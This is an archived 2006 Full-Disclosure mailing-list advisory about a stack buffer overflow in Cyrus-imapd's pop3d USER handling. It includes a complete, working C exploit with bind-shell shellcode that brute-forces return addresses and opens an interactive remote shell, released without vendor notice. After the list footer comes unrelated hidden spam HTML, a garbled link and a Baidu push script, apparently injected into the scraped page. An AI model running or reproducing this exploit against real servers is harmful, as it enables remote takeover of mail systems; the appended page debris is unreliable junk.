Shouts to blackzero, alex, wY!, revoguard, bogus, wtfomg and all those 
yankees
LOVE TO LISA :-)
genuine advisory by kcope/zeroday discovered by kcope!!! kingcope[at]gmx.net
public disclosure 21. May 2006
vendor was not notified (mail quota exceeded????) fuck it
let's get to business
---------------------------------------------------------------------------------------------------------------------
Cyrus-imapd pop3d Remote Stack Based Buffer Overrun

Description
There is a trivially remotely exploitable Buffer Overrun in 
Cyrus-imapd's pop3d.
The issue is not present in the default install, Cyrus-imapd has to have the
popsubfolders set to 1 in imapd.conf.
 From the manpage:
popsubfolders: 1
Allow access to subfolders of INBOX via POP3 by using userid+subfolder 
syntax as the authentication/authorization id.

When popsubfolders is set one can overflow a stack buffer by sending an 
overly long
USER command argument to the remote pop3d.

in cyrus-imapd-2.3.2/imap/pop3d.c
pop3d_canon_user is called every time a USER command is supplied to the 
pop3 server
with ulen=0;
look specifically at the
char userbuf[MAX_MAILBOX_NAME+1], *p;
...
if (!ulen) ulen = strlen(user);
...
memcpy(userbuf, user, ulen);
    userbuf[ulen] = '\0';
    
memcpy will overflow the userbuf buffer, if the user is above 
MAX_MAILBOX_NAME+1,
no length check is done in this routine.


--- snip ---
static int popd_canon_user(sasl_conn_t *conn, void *context,
               const char *user, unsigned ulen,
               unsigned flags, const char *user_realm,
               char *out, unsigned out_max, unsigned *out_ulen)
{
    char userbuf[MAX_MAILBOX_NAME+1], *p;
    size_t n;
    int r;

    if (!ulen) ulen = strlen(user);

    if (config_getswitch(IMAPOPT_POPSUBFOLDERS)) {
    /* make a working copy of the auth[z]id */
    memcpy(userbuf, user, ulen);
    userbuf[ulen] = '\0';
    user = userbuf;

    /* See if we're trying to access a subfolder */
    if ((p = strchr(userbuf, '+'))) {
        n = config_virtdomains ? strcspn(p, "@") : strlen(p);

        if (flags & SASL_CU_AUTHZID) {
        /* make a copy of the subfolder */
        if (popd_subfolder) free(popd_subfolder);
        popd_subfolder = xstrndup(p, n);
        }

        /* strip the subfolder from the auth[z]id */
        memmove(p, p+n, strlen(p+n)+1);
        ulen -= n;
    }
    }

    r = mysasl_canon_user(conn, context, user, ulen, flags, user_realm,
              out, out_max, out_ulen);

    if (!r && popd_subfolder && flags == SASL_CU_AUTHZID) {
    /* If we're only doing the authzid, put back the subfolder
       in case its used in the challenge/response calculation */
    n = strlen(popd_subfolder);
    if (*out_ulen + n > out_max) {
        sasl_seterror(conn, 0, "buffer overflow while canonicalizing");
        r = SASL_BUFOVER;
    }
    else {
        p = (config_virtdomains && (p = strchr(out, '@'))) ?
        p : out + *out_ulen;
        memmove(p+n, p, strlen(p)+1);
        memcpy(p, popd_subfolder, n);
        *out_ulen += n;
    }
    }

    return r;
}
--- snip ---


Attached is a working zeroday exploit for the mentioned vulnerability.
It brute forces the stack offset to spawn a uid/gid cyrus shell.
Maybe it needs a bit of tweaking to exploit cyrus servers in the wild,
since it was only tested locally on a debian install.
No further attempts to gain uid/gid root where done... maybe setreuid in 
shellcode?










/* zeroday warez
 * !!! PRIVATE - DONT DISTRIBUTE - PRIVATE !!!
 *********************************************
 * cyruspop3d.c - cyrus pop3d remote exploit by kcope
 * tested on cyrus-imapd-2.3.2,linux
 *
 * bug found 23 Apr 2006 by kcope
 *--------------------------------------------
 *
 * imapd/pop3d.c line 1830 :
 * char userbuf[MAX_MAILBOX_NAME+1], *p;
 * ...
 * if (!ulen) ulen = strlen(user);
 *   if (config_getswitch(IMAPOPT_POPSUBFOLDERS)) {
 *    memcpy(userbuf, user, ulen);
 *    userbuf[ulen] = '\0';
 * ...
 * popsubfolders has to be enabled
 *
 * thnx to blackzero revoguard wY! qobaiashi bogus alex
 * Love to Lisa :-)
 *********************************************
 * !!! PRIVATE - DONT DISTRIBUTE - PRIVATE !!!
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/time.h>
#include <unistd.h>
#include <netdb.h>
#include <errno.h>

#define POP3PORT 110
#define BINDPORT 13370

unsigned char shellcode[] =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
"\x43\x52\x66\x68\x34\x3a\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
"\x89\xe1\xcd\x80";

int do_connect (char *remotehost, int port)
{
    static struct hostent *host;
    static struct sockaddr_in addr;
    static int done=0;
    int s;
        
    if (!inet_aton(remotehost, &addr.sin_addr) && (done != 1))
    {
        host = gethostbyname(remotehost);
        if (!host)
        {
            perror("gethostbyname() failed");
            return -1;
        }
        addr.sin_addr = *(struct in_addr*)host->h_addr;
    }    
    
    s = socket(PF_INET, SOCK_STREAM, 0);
    if (s == -1)
    {
        close(s);
        perror("socket() failed");
        return -1;
    }    
    
    addr.sin_port = htons(port);
    addr.sin_family = AF_INET;

    if (connect(s, (struct sockaddr*)&addr, sizeof(addr)) == -1)
    {
        close(s);
        if (port == POP3PORT) perror("connect() failed");
        return -1;
    }    
    
    done=1;
    return s;
}

void do_exploit(int sock, unsigned int returnaddr)
{
    char nops[360];
    char nops2[100];
    char exploitbuffer[1024];
    char recvbuf[30];
    
    memset(&nops[0], '\0', sizeof(nops));
    memset(&nops[0], 'A', 352);
    memset(&nops2[0], '\0', sizeof(nops2));
    memset(&nops2[0], 'A', 90);

    while (1) {
        recv(sock, recvbuf, 1, 0);
        if ((recvbuf[0] == '\r') || (recvbuf[0] == '\n')) break;
    }    
    
    sprintf(exploitbuffer, "USER %s%s%s\r\n", nops, shellcode, nops2);
    
    exploitbuffer[strlen(exploitbuffer)-1] = (returnaddr >> 24) & 0xff;
    exploitbuffer[strlen(exploitbuffer)-2] = (returnaddr >> 16) & 0xff;
    exploitbuffer[strlen(exploitbuffer)-3] = (returnaddr >> 8) & 0xff;
    exploitbuffer[strlen(exploitbuffer)-4] = (returnaddr) & 0xff;

    send(sock, exploitbuffer, strlen(exploitbuffer), 0);
    recv(sock, recvbuf, sizeof(recvbuf)-1, 0);
}

int do_checkvulnerable(int sock) {
    char checkbuffer[1024];
    char recvbuffer[10];
    
    memset(&checkbuffer[0], '\0', sizeof(checkbuffer)-1);
    memset(&checkbuffer[0], 'A', sizeof(checkbuffer)-2);
    checkbuffer[0]='U';
    checkbuffer[1]='S';
    checkbuffer[2]='E';
    checkbuffer[3]='R';
    checkbuffer[4]=' ';
    checkbuffer[sizeof(checkbuffer)-3]='\r';
    checkbuffer[sizeof(checkbuffer)-2]='\n';
    
    while (1) {
        recv(sock, recvbuffer, 1, 0);
        if ((recvbuffer[0] == '\r') || (recvbuffer[0] == '\n')) break;
    }
    
    send(sock, checkbuffer, strlen(checkbuffer), 0);
        
    if (recv(sock, recvbuffer, sizeof(recvbuffer)-1, MSG_WAITALL) < 3)
        return 0;
    
    return -1;
}

int do_remote_shell(int sockfd)
{
    while(1)
         {
            fd_set fds;
            FD_ZERO(&fds);
            FD_SET(0,&fds);
            FD_SET(sockfd,&fds);
            if(select(FD_SETSIZE,&fds,NULL,NULL,NULL))
            {
               int cnt;
               char buf[1024];
               if(FD_ISSET(0,&fds))
               {
                  if((cnt=read(0,buf,1024))<1)
                  {
                     if(errno==EWOULDBLOCK||errno==EAGAIN)
                       continue;
                     else
                       break;
                  }
                  write(sockfd,buf,cnt);
               }
               if(FD_ISSET(sockfd,&fds))
               {
                  if((cnt=read(sockfd,buf,1024))<1)
                  {
                       if(errno==EWOULDBLOCK||errno==EAGAIN)
                         continue;
                       else
                         break;
                  }
                  write(1,buf,cnt);
               }
            }
         }               
}

int main(int argc, char **argv)
{
    char remotehost[255];
    int s,s2,i;
    unsigned int returnaddr;
    
    printf("cyrus pop3d remote exploit [kcope/2006]\n");
    
    if (argc < 3) {
        printf("usage: %s <remote host> <brute force start return 
address>\n", argv[0]);
        printf("eg: %s localhost bfffa000\n", argv[0]);
        return 1;
    }

    strcpy(remotehost, argv[1]); //uhoho
    if (sscanf(argv[2], "%8x", &returnaddr) == 0) {
        printf("Specify valid start return address\n");
        return 1;
    }
    
    printf("Checking if vulnerable... ");
    s=do_connect(remotehost, POP3PORT);
    if (do_checkvulnerable(s) == -1) {
        close(s);    
        printf("\ncyrus pop3d seems not to be vulnerable\nno 
popsubfolders defined at remote host?\n");
        return 1;
    }
    close(s);    
    printf("SUCCESS!\n");
    
    while (returnaddr < 0xbfffffff) {
        returnaddr+=16;
    
        printf("CRACKADDR = %4x\n", returnaddr);
        fflush(stdout);
        s=do_connect(remotehost, POP3PORT);
        if (s==-1)
            return 1;

        do_exploit(s, returnaddr);
        for (i=0;i<2;i++) {
            if ((s2=do_connect(remotehost, BINDPORT)) != -1) {
                printf("\nALEX,ALEX WE GOT IT!!!\n");
                do_remote_shell(s2);
                return 0;
            }
            close(s2);
        }
        
        close(s);
    }
            
    return 0;
}

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
<div style="position:fixed;left:-9000px;top:-9000px;"><em id="7ztzv"></em><center id="7ztzv"></center><mark id="7ztzv"><center id="7ztzv"></center></mark><output id="7ztzv"><noframes id="7ztzv"></noframes></output><font id="7ztzv"><delect id="7ztzv"></delect></font><ruby id="7ztzv"><big id="7ztzv"></big></ruby><progress id="7ztzv"><sub id="7ztzv"></sub></progress><th id="7ztzv"><big id="7ztzv"></big></th><form id="7ztzv"><nobr id="7ztzv"></nobr></form><ol id="7ztzv"><video id="7ztzv"></video></ol><th id="7ztzv"><progress id="7ztzv"></progress></th><strike id="7ztzv"><span id="7ztzv"></span></strike><em id="7ztzv"><span id="7ztzv"></span></em><video id="7ztzv"><strike id="7ztzv"></strike></video><th id="7ztzv"><noframes id="7ztzv"></noframes></th><em id="7ztzv"><span id="7ztzv"></span></em><ins id="7ztzv"><b id="7ztzv"></b></ins><ol id="7ztzv"><output id="7ztzv"></output></ol><menuitem id="7ztzv"><thead id="7ztzv"></thead></menuitem><del id="7ztzv"><ruby id="7ztzv"></ruby></del><noframes id="7ztzv"><span id="7ztzv"></span></noframes><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead><dl id="7ztzv"><rp id="7ztzv"></rp></dl><progress id="7ztzv"><thead id="7ztzv"></thead></progress><listing id="7ztzv"><menuitem id="7ztzv"></menuitem></listing><strike id="7ztzv"><pre id="7ztzv"></pre></strike><em id="7ztzv"><address id="7ztzv"></address></em><big id="7ztzv"><address id="7ztzv"></address></big><address id="7ztzv"><listing id="7ztzv"></listing></address><ruby id="7ztzv"><strike id="7ztzv"></strike></ruby><listing id="7ztzv"><menuitem id="7ztzv"></menuitem></listing><big id="7ztzv"><sub id="7ztzv"></sub></big><var id="7ztzv"><meter id="7ztzv"></meter></var><span id="7ztzv"><video id="7ztzv"></video></span><listing id="7ztzv"><mark id="7ztzv"></mark></listing><progress id="7ztzv"><address id="7ztzv"></address></progress><nobr id="7ztzv"><progress id="7ztzv"></progress></nobr><noframes id="7ztzv"><sub id="7ztzv"></sub></noframes><font id="7ztzv"><delect id="7ztzv"></delect></font><strike id="7ztzv"><pre id="7ztzv"></pre></strike><delect id="7ztzv"><menuitem id="7ztzv"></menuitem></delect><em id="7ztzv"><pre id="7ztzv"></pre></em><mark id="7ztzv"><cite id="7ztzv"></cite></mark><delect id="7ztzv"><ins id="7ztzv"></ins></delect><pre id="7ztzv"><rp id="7ztzv"></rp></pre><cite id="7ztzv"><var id="7ztzv"></var></cite><menuitem id="7ztzv"><cite id="7ztzv"></cite></menuitem><ruby id="7ztzv"><p id="7ztzv"></p></ruby><em id="7ztzv"><form id="7ztzv"></form></em><rp id="7ztzv"><em id="7ztzv"></em></rp>
<video id="7ztzv"><noframes id="7ztzv"></noframes></video><cite id="7ztzv"><del id="7ztzv"></del></cite><meter id="7ztzv"><thead id="7ztzv"></thead></meter><p id="7ztzv"><dl id="7ztzv"></dl></p><meter id="7ztzv"><thead id="7ztzv"></thead></meter><sub id="7ztzv"><nobr id="7ztzv"></nobr></sub><mark id="7ztzv"><cite id="7ztzv"></cite></mark><menuitem id="7ztzv"><font id="7ztzv"></font></menuitem><del id="7ztzv"><rp id="7ztzv"></rp></del><thead id="7ztzv"><delect id="7ztzv"></delect></thead><var id="7ztzv"><menuitem id="7ztzv"></menuitem></var><ins id="7ztzv"><cite id="7ztzv"></cite></ins><delect id="7ztzv"><output id="7ztzv"></output></delect><p id="7ztzv"><pre id="7ztzv"></pre></p><ruby id="7ztzv"><p id="7ztzv"></p></ruby><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead><nobr id="7ztzv"><meter id="7ztzv"></meter></nobr><progress id="7ztzv"><address id="7ztzv"></address></progress><thead id="7ztzv"><var id="7ztzv"></var></thead><ins id="7ztzv"><i id="7ztzv"></i></ins><ins id="7ztzv"><b id="7ztzv"></b></ins><nobr id="7ztzv"><meter id="7ztzv"></meter></nobr><ins id="7ztzv"><i id="7ztzv"></i></ins><font id="7ztzv"><delect id="7ztzv"></delect></font><em id="7ztzv"><form id="7ztzv"></form></em><var id="7ztzv"><ins id="7ztzv"></ins></var><span id="7ztzv"><th id="7ztzv"></th></span><ol id="7ztzv"><rp id="7ztzv"></rp></ol><th id="7ztzv"><progress id="7ztzv"></progress></th><address id="7ztzv"><dfn id="7ztzv"></dfn></address><menuitem id="7ztzv"><cite id="7ztzv"></cite></menuitem><noframes id="7ztzv"><span id="7ztzv"></span></noframes><noframes id="7ztzv"><form id="7ztzv"></form></noframes><big id="7ztzv"><form id="7ztzv"></form></big><track id="7ztzv"><noframes id="7ztzv"></noframes></track><em id="7ztzv"><span id="7ztzv"></span></em><span id="7ztzv"><th id="7ztzv"></th></span><span id="7ztzv"><th id="7ztzv"></th></span><video id="7ztzv"><em id="7ztzv"></em></video><delect id="7ztzv"><ins id="7ztzv"></ins></delect><b id="7ztzv"><del id="7ztzv"></del></b><progress id="7ztzv"><sub id="7ztzv"></sub></progress><dfn id="7ztzv"><mark id="7ztzv"></mark></dfn><rp id="7ztzv"><em id="7ztzv"></em></rp><track id="7ztzv"><noframes id="7ztzv"></noframes></track><address id="7ztzv"><th id="7ztzv"></th></address><cite id="7ztzv"><delect id="7ztzv"></delect></cite><cite id="7ztzv"><var id="7ztzv"></var></cite><output id="7ztzv"><i id="7ztzv"></i></output><track id="7ztzv"><big id="7ztzv"></big></track>
<big id="7ztzv"><address id="7ztzv"></address></big><p id="7ztzv"><dl id="7ztzv"></dl></p><meter id="7ztzv"><font id="7ztzv"></font></meter><address id="7ztzv"><nobr id="7ztzv"></nobr></address><menuitem id="7ztzv"><cite id="7ztzv"></cite></menuitem><pre id="7ztzv"><video id="7ztzv"></video></pre><th id="7ztzv"><progress id="7ztzv"></progress></th><p id="7ztzv"><pre id="7ztzv"></pre></p><ruby id="7ztzv"><em id="7ztzv"></em></ruby><del id="7ztzv"><ins id="7ztzv"></ins></del><sub id="7ztzv"><listing id="7ztzv"></listing></sub><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead><thead id="7ztzv"><var id="7ztzv"></var></thead><sub id="7ztzv"><nobr id="7ztzv"></nobr></sub><b id="7ztzv"><del id="7ztzv"></del></b><big id="7ztzv"><address id="7ztzv"></address></big><form id="7ztzv"><nobr id="7ztzv"></nobr></form><ol id="7ztzv"><ins id="7ztzv"></ins></ol><font id="7ztzv"><delect id="7ztzv"></delect></font><big id="7ztzv"><sub id="7ztzv"></sub></big><listing id="7ztzv"><progress id="7ztzv"></progress></listing><delect id="7ztzv"><output id="7ztzv"></output></delect><noframes id="7ztzv"><span id="7ztzv"></span></noframes><track id="7ztzv"><noframes id="7ztzv"></noframes></track><menuitem id="7ztzv"><sub id="7ztzv"></sub></menuitem><address id="7ztzv"><th id="7ztzv"></th></address><address id="7ztzv"><track id="7ztzv"></track></address><nobr id="7ztzv"><meter id="7ztzv"></meter></nobr><em id="7ztzv"><pre id="7ztzv"></pre></em><ruby id="7ztzv"><strike id="7ztzv"></strike></ruby><em id="7ztzv"><form id="7ztzv"></form></em><form id="7ztzv"><track id="7ztzv"></track></form><dfn id="7ztzv"><progress id="7ztzv"></progress></dfn><rp id="7ztzv"><noframes id="7ztzv"></noframes></rp><i id="7ztzv"><ol id="7ztzv"></ol></i><i id="7ztzv"><del id="7ztzv"></del></i><cite id="7ztzv"><delect id="7ztzv"></delect></cite><strike id="7ztzv"><dl id="7ztzv"></dl></strike><dfn id="7ztzv"><mark id="7ztzv"></mark></dfn><address id="7ztzv"><th id="7ztzv"></th></address><ins id="7ztzv"><font id="7ztzv"></font></ins><thead id="7ztzv"><var id="7ztzv"></var></thead><video id="7ztzv"><strike id="7ztzv"></strike></video><p id="7ztzv"><pre id="7ztzv"></pre></p><video id="7ztzv"><i id="7ztzv"></i></video><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead><thead id="7ztzv"><listing id="7ztzv"></listing></thead><dl id="7ztzv"><rp id="7ztzv"></rp></dl><address id="7ztzv"><th id="7ztzv"></th></address><var id="7ztzv"><menuitem id="7ztzv"></menuitem></var>
<p id="7ztzv"><var id="7ztzv"></var></p><ins id="7ztzv"><i id="7ztzv"></i></ins><strike id="7ztzv"><span id="7ztzv"></span></strike><del id="7ztzv"><output id="7ztzv"></output></del><font id="7ztzv"><delect id="7ztzv"></delect></font><output id="7ztzv"><em id="7ztzv"></em></output><p id="7ztzv"><span id="7ztzv"></span></p><big id="7ztzv"><thead id="7ztzv"></thead></big><video id="7ztzv"><noframes id="7ztzv"></noframes></video><b id="7ztzv"><ol id="7ztzv"></ol></b><font id="7ztzv"><dfn id="7ztzv"></dfn></font><font id="7ztzv"><var id="7ztzv"></var></font><ins id="7ztzv"><i id="7ztzv"></i></ins><dfn id="7ztzv"><meter id="7ztzv"></meter></dfn><rp id="7ztzv"><strike id="7ztzv"></strike></rp><del id="7ztzv"><ruby id="7ztzv"></ruby></del><var id="7ztzv"><ruby id="7ztzv"></ruby></var><rp id="7ztzv"><em id="7ztzv"></em></rp><em id="7ztzv"><span id="7ztzv"></span></em><del id="7ztzv"><ruby id="7ztzv"></ruby></del><listing id="7ztzv"><menuitem id="7ztzv"></menuitem></listing><track id="7ztzv"><noframes id="7ztzv"></noframes></track><form id="7ztzv"><nobr id="7ztzv"></nobr></form><video id="7ztzv"><big id="7ztzv"></big></video><video id="7ztzv"><em id="7ztzv"></em></video><p id="7ztzv"><span id="7ztzv"></span></p><sub id="7ztzv"><nobr id="7ztzv"></nobr></sub><ins id="7ztzv"><b id="7ztzv"></b></ins><dfn id="7ztzv"><progress id="7ztzv"></progress></dfn><var id="7ztzv"><mark id="7ztzv"></mark></var><font id="7ztzv"><delect id="7ztzv"></delect></font><big id="7ztzv"><sub id="7ztzv"></sub></big><address id="7ztzv"><th id="7ztzv"></th></address><form id="7ztzv"><th id="7ztzv"></th></form><mark id="7ztzv"><cite id="7ztzv"></cite></mark><progress id="7ztzv"><font id="7ztzv"></font></progress><mark id="7ztzv"><cite id="7ztzv"></cite></mark><strike id="7ztzv"><form id="7ztzv"></form></strike><mark id="7ztzv"><font id="7ztzv"></font></mark><strike id="7ztzv"><form id="7ztzv"></form></strike><pre id="7ztzv"><video id="7ztzv"></video></pre><strike id="7ztzv"><dl id="7ztzv"></dl></strike><delect id="7ztzv"><ins id="7ztzv"></ins></delect><dl id="7ztzv"><rp id="7ztzv"></rp></dl><listing id="7ztzv"><menuitem id="7ztzv"></menuitem></listing><p id="7ztzv"><dl id="7ztzv"></dl></p><mark id="7ztzv"><i id="7ztzv"></i></mark><meter id="7ztzv"><sub id="7ztzv"></sub></meter><rp id="7ztzv"><em id="7ztzv"></em></rp><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead>
<th id="7ztzv"><big id="7ztzv"></big></th><del id="7ztzv"><rp id="7ztzv"></rp></del><video id="7ztzv"><big id="7ztzv"></big></video><delect id="7ztzv"><ruby id="7ztzv"></ruby></delect><big id="7ztzv"><sub id="7ztzv"></sub></big><track id="7ztzv"><em id="7ztzv"></em></track><cite id="7ztzv"><ol id="7ztzv"></ol></cite><i id="7ztzv"><dl id="7ztzv"></dl></i><noframes id="7ztzv"><address id="7ztzv"></address></noframes><ruby id="7ztzv"><i id="7ztzv"></i></ruby><delect id="7ztzv"><output id="7ztzv"></output></delect><delect id="7ztzv"><output id="7ztzv"></output></delect><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead><ol id="7ztzv"><ruby id="7ztzv"></ruby></ol><delect id="7ztzv"><output id="7ztzv"></output></delect><var id="7ztzv"><menuitem id="7ztzv"></menuitem></var><track id="7ztzv"><big id="7ztzv"></big></track><rp id="7ztzv"><em id="7ztzv"></em></rp><em id="7ztzv"><span id="7ztzv"></span></em><mark id="7ztzv"><b id="7ztzv"></b></mark><i id="7ztzv"><ol id="7ztzv"></ol></i><progress id="7ztzv"><sub id="7ztzv"></sub></progress><rp id="7ztzv"><strike id="7ztzv"></strike></rp><font id="7ztzv"><var id="7ztzv"></var></font><span id="7ztzv"><th id="7ztzv"></th></span><video id="7ztzv"><strike id="7ztzv"></strike></video><th id="7ztzv"><em id="7ztzv"></em></th><delect id="7ztzv"><ins id="7ztzv"></ins></delect><sub id="7ztzv"><delect id="7ztzv"></delect></sub><progress id="7ztzv"><sub id="7ztzv"></sub></progress><sub id="7ztzv"><listing id="7ztzv"></listing></sub><thead id="7ztzv"><listing id="7ztzv"></listing></thead><form id="7ztzv"><th id="7ztzv"></th></form><track id="7ztzv"><em id="7ztzv"></em></track><dfn id="7ztzv"><menuitem id="7ztzv"></menuitem></dfn><b id="7ztzv"><dl id="7ztzv"></dl></b><nobr id="7ztzv"><big id="7ztzv"></big></nobr><track id="7ztzv"><progress id="7ztzv"></progress></track><ruby id="7ztzv"><p id="7ztzv"></p></ruby><pre id="7ztzv"><nobr id="7ztzv"></nobr></pre><pre id="7ztzv"><track id="7ztzv"></track></pre><ruby id="7ztzv"><strike id="7ztzv"></strike></ruby><em id="7ztzv"><span id="7ztzv"></span></em><mark id="7ztzv"><i id="7ztzv"></i></mark><rp id="7ztzv"><p id="7ztzv"></p></rp><delect id="7ztzv"><ruby id="7ztzv"></ruby></delect><sub id="7ztzv"><dfn id="7ztzv"></dfn></sub><thead id="7ztzv"><var id="7ztzv"></var></thead><i id="7ztzv"><ol id="7ztzv"></ol></i><track id="7ztzv"><strike id="7ztzv"></strike></track></div>

<a href="http://www.bjnorthway.com/">ÑÇÖÞÅ·ÃÀÔÚÏß</a>
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>
</body>